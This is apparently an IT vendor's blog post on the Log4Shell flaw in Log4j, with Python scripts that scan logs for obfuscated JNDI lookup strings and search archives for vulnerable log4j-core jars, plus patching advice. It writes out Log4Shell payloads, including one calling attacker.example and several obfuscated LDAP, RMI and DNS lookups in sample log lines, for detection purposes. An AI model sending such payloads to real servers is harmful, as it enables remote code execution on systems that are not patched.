The Log4j Attack and You
Log4j is an open-source (free-to-use) Java logging library maintained by the Apache Software Foundation. It is not part of the Apache web server, and it isn't crucial to what a website does. Instead, it generates log entries about the application's activity. The problem is that Log4j does more than write text to a file: when a vulnerable version logs a message containing a lookup such as ${jndi:ldap://attacker.example/a}, it resolves that lookup, contacting a server the attacker names and, in the worst case, loading and running code from it. Since attackers control much of what gets logged (a username, a User-Agent header, a search term), they can get any application using a vulnerable version of the library to do pretty much anything. For those interested in the technicalities, the remote code execution (RCE) vulnerability is CVE-2021-44228, widely known as Log4Shell; Log4j 2.0-beta9 through 2.14.1 are affected.
And it’s being actively exploited, just in time for the holidays (of course).
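A practical first check, added here as an example (it is not code from the original post or from any vendor), is to look for the exploit string in the logs you already have. The access log lines below are constructed, with attacker addresses from the documentation ranges. The point the example makes is that matching the literal text ${jndi: is not enough: attackers wrap it in Log4j's own lookups (${lower:j}, ${::-j}, ${env:NOPE:-j}) and URL-encode it, so the script resolves those wrappers inside-out before it checks, and pulls out the callback host so you know what to look for in your firewall logs.

```python
import re
import urllib.parse

# Constructed sample access log lines in Apache combined format (not real traffic).
# Lines 2-5 carry Log4Shell lookup strings in the User-Agent or request path,
# including obfuscated forms seen in the wild; lines 1 and 6 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.9:1389/a}"
198.51.100.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:ldap://198.51.100.7/x} HTTP/1.1" 404 0 "-" "curl/7.79"
198.51.100.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.8/obj}"
198.51.100.9 - - [10/Dec/2021:12:00:05 +0000] "GET /%24%7Bjndi%3Adns%3A%2F%2Fcanary.example%2Fa%7D HTTP/1.1" 404 0 "-" "-"
192.0.2.3 - - [10/Dec/2021:12:00:06 +0000] "GET /docs/${version} HTTP/1.1" 200 100 "-" "-"
"""

# An innermost ${...} expression: one with no further ${ inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Once obfuscation is stripped, every Log4Shell payload starts with ${jndi:
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
CALLBACK = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s}:]+)", re.IGNORECASE)


def _resolve(body):
    """Resolve the lookups attackers use purely to hide the word 'jndi'.

    ${lower:J} -> j, ${upper:j} -> J, and any ${name:-default} form
    (${::-j}, ${env:NOPE:-j}, ${sys:nope:-j}) -> its default value.
    Returns None for anything else so it is left untouched.
    """
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize(text, max_rounds=20):
    """URL-decode once, then collapse nested obfuscation lookups inside-out."""
    text = urllib.parse.unquote(text)
    for _ in range(max_rounds):
        changed = False

        def repl(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def is_log4shell_probe(line):
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan_log(text):
    """Return (line_no, source_ip, scheme, callback_host) for each probe line."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        source_ip = line.split(" ", 1)[0]
        norm = normalize(line)
        callback = CALLBACK.search(norm)
        if callback:
            hits.append((line_no, source_ip, callback.group(1).lower(), callback.group(2)))
        elif JNDI_LOOKUP.search(norm):
            hits.append((line_no, source_ip, None, None))  # jndi lookup, target not parsed
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d from %s: %s callback to %s" % hit)
```

A web server's access log only shows what reached the web tier. The lookup can arrive in any header or form field the application logs, so run the same check over application logs too, and treat an outbound LDAP, RMI or DNS connection from a server to an address it has no business talking to as the stronger signal.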
The first thing you should be wondering is whether you're affected by this vulnerability. Well, maybe. Just because you aren't running Java applications yourself doesn't mean nobody is, and that's part of the problem with attacks like this. There are many software tools and devices with web interfaces, and a great many of them are built in Java with Log4j bundled inside. Any such product running a vulnerable version of the library leaves you vulnerable as well, whether or not you ever knew Log4j was in it.
If that's the case, there's little you can do other than wait for and apply a vendor patch (some vendors published interim mitigations, such as removing the JndiLookup class from the bundled library; follow their guidance rather than improvising on a product you don't own). This is fairly straightforward because you're monitoring all your software, hardware and device vendors for critical patches and updates anyway, right? That's pretty much standard advice from everywhere, and has been for a long time. Not actively monitoring for critical updates is the easiest way to get failing grades for cyber security.
So how can you tell if you're vulnerable?
First, check with your vendors, but remember that not all vendors are created equal, so they may or may not be able to answer your question. Still, it's at least a bit more straightforward than your second option: testing for yourself. Huntress has published a free Log4Shell tester that generates a lookup string carrying a unique token; you submit it through a web application's input fields and headers, and if the application is vulnerable the callback shows up on the Huntress page. Using it properly requires a bit of skill and the ability to follow instructions to the letter, and it only exercises the inputs you remember to feed it. The complementary check is to search the hosts you control for copies of the Log4j library and confirm their versions.
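The second option in practice, as an added example (this is not the Huntress tool and not code from the original post): a scanner that walks a directory tree looking for log4j-core inside jar, war and ear files. It keys on the library's own entry names, the JndiLookup class and the Maven pom.properties file, rather than on file names, so a copy that has been renamed or bundled inside another archive still shows up. The sample install it scans is constructed in a temporary directory from stand-in jars with the right entry names but no real bytecode; the version threshold is Apache's (below 2.17.0 needs an upgrade), and a jar with JndiLookup.class deleted is reported as mitigated rather than as needing action.

```python
import io
import os
import re
import sys
import tempfile
import zipfile

# Entry names that identify log4j-core inside any archive, whatever the file is called.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# 2.15.0 fixed CVE-2021-44228 but was followed by further fixes; treat anything
# below 2.17.0 (the Java 8 line) as needing an upgrade.
FIXED = (2, 17, 0)


def parse_version(pom_properties):
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_properties, re.M)
    return tuple(int(x) for x in m.groups()) if m else None


def inspect_archive(zf, label):
    """Report log4j-core found in an open archive, recursing into nested archives."""
    findings = []
    names = set(zf.namelist())
    if POM_PROPS in names or JNDI_CLASS in names:
        version = None
        if POM_PROPS in names:
            version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
        has_jndi = JNDI_CLASS in names
        findings.append({
            "archive": label,
            "name": os.path.basename(label),
            "version": version,
            "jndi_lookup_present": has_jndi,
            # An unparseable version (2.0-beta9, or a shaded copy with no pom) counts as old.
            "needs_action": has_jndi and (version is None or version < FIXED),
        })
    for entry in sorted(names):
        if entry.lower().endswith(ARCHIVE_EXT):
            try:
                nested = zipfile.ZipFile(io.BytesIO(zf.read(entry)))
            except zipfile.BadZipFile:
                continue
            findings.extend(inspect_archive(nested, label + "!" + entry))
    return findings


def scan_tree(root):
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fname)
                try:
                    with zipfile.ZipFile(path) as zf:
                        findings.extend(inspect_archive(zf, path))
                except zipfile.BadZipFile:
                    continue
    return findings


def _fake_log4j_jar(version, with_jndi_class):
    """Constructed stand-in for log4j-core: correct entry names, no real bytecode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "version=%s\nartifactId=log4j-core\n" % version)
        if with_jndi_class:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def build_sample_tree():
    """Constructed sample install: one old jar, one with JndiLookup removed,
    and one fixed jar nested inside a .war. Returns the temp directory."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    os.makedirs(os.path.join(root, "lib"))
    with open(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(_fake_log4j_jar("2.14.1", True))
    with open(os.path.join(root, "lib", "log4j-core-2.14.1-mitigated.jar"), "wb") as f:
        f.write(_fake_log4j_jar("2.14.1", False))
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", _fake_log4j_jar("2.17.1", True))
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for f in scan_tree(target):
        print("%-12s version=%s JndiLookup=%s  %s" % (
            "NEEDS ACTION" if f["needs_action"] else "ok",
            f["version"], f["jndi_lookup_present"], f["archive"]))
```

Run it with a path argument (for example the install directory of a product you suspect) to scan a real tree; without one it scans the constructed sample. It finds copies on disk, not copies a running process has already loaded from somewhere you didn't scan, so pair it with the running-application test above.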
Is there anything else you can do?
Actually, yes! Restrict which IPs can connect to the management interfaces (GUIs) of your devices and services. It can be difficult for public websites, but the idea is still pretty simple:
Get a list of all the services you have available on the internet (email, OWA, VPNs, etc.)
For each service, ask if the entire planet needs to be able to reach it.
Most of the time the answer to the second question is "no", in which case you can restrict who can access each service. Geographic IP filtering easily limits access so that only IPs from certain countries can connect. This won't stop attackers located in an allowed country, or ones who route through a VPN or cloud provider there, but it's better than nothing. For Log4Shell in particular, the same thinking applies in the outbound direction: the exploit only succeeds if the vulnerable server can reach the attacker's LDAP, RMI or DNS server, so restricting what your servers may connect to on the internet blunts the attack even on systems you can't patch yet.
At the end of the day the most important thing is to make sure you actually know what's in your network. That includes hardware, software, and any other online tools you use. Pretty much anything on your network can be used to get inside, from printers to smartphones and even IoT lightbulbs. Restricting access whenever and wherever you can and keeping everything on your network up to date sounds like basic advice, but it's also effective.
As the holidays approach, I’ll dip into Julius Caesar for this week’s bit of Shakespearean wisdom: “I am fresh of spirit and resolved to meet all perils very constantly.”
If you require assistance with improving your cyber security profile or testing your network for Log4j vulnerabilities, contact your TRINUS account manager today.
By Kind, Courtesy of Your Friendly Neighbourhood Cyber-Man.
trinustech.com